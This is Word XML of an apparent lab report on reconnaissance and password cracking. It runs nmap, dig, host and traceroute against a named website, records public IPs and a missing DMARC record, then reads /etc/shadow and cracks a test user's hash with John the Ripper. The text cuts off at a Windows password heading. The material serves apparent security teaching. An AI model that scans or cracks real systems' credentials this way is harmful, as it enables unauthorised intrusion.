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5241" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reconnaissance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7E601A" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="000C690D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1739B325" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r>
        <w:t xml:space="preserve">FINDING </w:t>
      </w:r>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">OS, PUBLIC IP, OPEN </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>PORTS ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> TECHNOLOGY USED, AND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>HOSTING  INFORMATION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">/DNS/SUB DOMAIN </w:t>
      </w:r>
      <w:r>
        <w:t>TO A TARGET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A42EC" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t># Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>sL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="002F5F86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>abnersafaris.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08061F38" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">The code identifies public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE865C2" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00B61AA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B7C0A56" wp14:editId="40A56C1E">
            <wp:extent cx="3606985" cy="749339"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8107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6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A915" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="002F5F86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>abnersafaris.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D2749CB" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">To identify all the open ports and the service in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>run  for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> example 21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746CF4F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014117F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2531A3CD" wp14:editId="7C65AE56">
            <wp:extent cx="4330923" cy="2711589"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60801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C62B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t># Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="002F5F86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>abnersafaris.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="173E2981" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">To find open </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>ports ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> and operating system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CAF116" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014117F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63DE024A" wp14:editId="570AC432">
            <wp:extent cx="5778797" cy="2686188"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15984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5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ADCF" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>abnersafaris.com</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0BCFB8" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">Dig deep </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>in to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> domain </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>name  to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> find which public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> using   which is 31.22.7.242</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192C8084" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="0014117F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5315A0E8" wp14:editId="7FCACFF3">
            <wp:extent cx="4496031" cy="2349621"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132682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24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040B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"># host </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="002F5F86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">  </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>abnersafaris.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67E70DC2" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">Find the host public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607BDAB" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="0014117F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22989E28" wp14:editId="53F82831">
            <wp:extent cx="4292821" cy="628682"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13312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9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1C12" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:lastRenderedPageBreak/>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>traceroute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>abnersafaris.com</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B594F0" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">Trace the path of the domain name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1F9015" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014117F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="722ABA76" wp14:editId="6C4038D3">
            <wp:extent cx="4654789" cy="1035103"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5082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3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47C1" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002F5F86">
        <w:t>Using mxToolbox.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B86D97" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">Discovered public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>185.181.254.145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950EF5B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> Email security police “DMARC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>record  is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> Enabled “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB440F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00C92E37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76D0EF82" wp14:editId="48814DFB">
            <wp:extent cx="5112013" cy="2635385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18369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7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0AA" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D"/>
    <w:p w14:paraId="7047BBBB" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Censys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AF9FB10" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002464BA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2399647C" wp14:editId="4EB0BBC4">
            <wp:extent cx="7150467" cy="4007056"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179929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046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3E40" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86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1D5DE1E3" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002F5F86">
        <w:lastRenderedPageBreak/>
        <w:t>HOW TO HACK A PASSWORD OF LINUX MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AF83A1" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> apt update </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295979E0" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>upgrade</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> the system with the latest software </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A55DAA" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hatren</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B07340D" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">A user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hatren</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> was added with password hidden </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64A2C6" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C56DC9" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>display</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> all the hashes of the added users in the system with the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>user name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0211620F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002E6A35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D203C6C" wp14:editId="08BADC7F">
            <wp:extent cx="5829600" cy="666784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127093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30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91A" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t>$nano hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7985E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">This opens a text </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>editer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve"> where hashes are added, “nano can also be replaced with ‘vi’ ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>gedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5F86">
        <w:t>’ “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D2A88" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t>$cat hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75A230" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002E6A35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A99EED" wp14:editId="1D4292B6">
            <wp:extent cx="5512083" cy="552478"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14259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8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F86">
        <w:t>$nano passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDBCBCC" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">Add all the possible password in the file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426526F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t>$ cat passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3559F1" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">Display the added passwords in the file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C868DE" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="00B46B6D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E0314D4" wp14:editId="7742D225">
            <wp:extent cx="4819898" cy="1111307"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18085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5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B8EE" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:lastRenderedPageBreak/>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00B46B6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B46B6D">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B46B6D">
        <w:t xml:space="preserve"> john --format=crypt --wordlist=passwords.txt hashfile.txt    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A269B8" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">   · Loads a password hash from hashes.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BE677F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">   · Tries to crack it using the crypt format (Linux password hashing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7895610E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">   · First tries "single crack" mode (variations of username), then a wordlist </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B941D6" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">   · Successfully finds the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F6A02" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B46B6D">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B46B6D">
        <w:t xml:space="preserve"> john --format=crypt --show hashfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7332C290" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="002F5F86">
        <w:t xml:space="preserve">   · Displays the cracked result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F079E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="002F5F86" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:r w:rsidRPr="000A601A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5984BA12" wp14:editId="53E31C47">
            <wp:extent cx="6058211" cy="2228965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3449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2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211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B99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3A5F3885" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00AE0279" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE0279">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">HOW TO HACK A WINDOWS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE0279">
        <w:t>PASSWORD  IN</w:t>
